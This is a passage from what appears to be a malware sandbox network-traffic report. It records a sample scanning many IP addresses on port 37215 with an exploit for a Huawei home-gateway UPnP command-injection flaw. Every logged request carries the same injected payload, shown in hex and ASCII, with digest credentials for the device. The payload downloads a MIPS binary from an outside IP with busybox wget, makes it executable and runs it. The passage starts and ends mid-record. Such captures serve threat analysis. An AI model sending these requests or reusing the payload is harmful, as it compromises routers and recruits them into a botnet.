20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            891192.168.2.1344646197.188.36.8037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.919147968 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            892192.168.2.1357886197.184.200.6037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.920635939 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            893192.168.2.133795041.78.178.2337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.921766996 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            894192.168.2.1333046197.142.139.14337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.922975063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            895192.168.2.1357234156.82.178.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.924570084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            896192.168.2.1355820156.189.36.16237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.925765038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            897192.168.2.1342424197.184.123.1637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.926996946 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            898192.168.2.1346424197.157.72.9137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.928461075 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            899192.168.2.1333768156.147.57.4037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.930758953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            900192.168.2.1333406156.179.20.1737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.932450056 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            901192.168.2.135283841.70.30.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.933794975 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
